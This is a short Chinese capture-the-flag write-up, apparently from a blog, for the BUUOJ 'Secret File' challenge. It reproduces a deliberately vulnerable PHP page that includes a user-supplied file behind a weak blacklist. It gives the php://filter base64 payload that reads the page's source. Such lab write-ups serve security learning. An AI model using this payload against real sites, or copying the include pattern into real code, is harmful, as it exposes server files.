BUUOJ [极客大挑战 2019]Secret File

[极客大挑战 2019]Secret File

0X01考点

php的file伪协议读取文件

?file=php://filter/convert.base64-encode/resource=

 

0X02解题过程

bp开启,有页面跳转,然后访问

/secr3t.php

出现了源代码


    secret
    
php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag

 

../目录穿越,等等都被过滤,维度没有过滤file读取

 

就直接用file伪协议读取就好了

BUUOJ [极客大挑战 2019]Secret File_第1张图片

 

 

 

然后base64解密就ok了

 

0X03感想

 

还是要加油啊,争取每天四篇博客!

0X04参考博客

https://www.cnblogs.com/wangtanzhi/p/12184620.html

你可能感兴趣的:(BUUOJ [极客大挑战 2019]Secret File)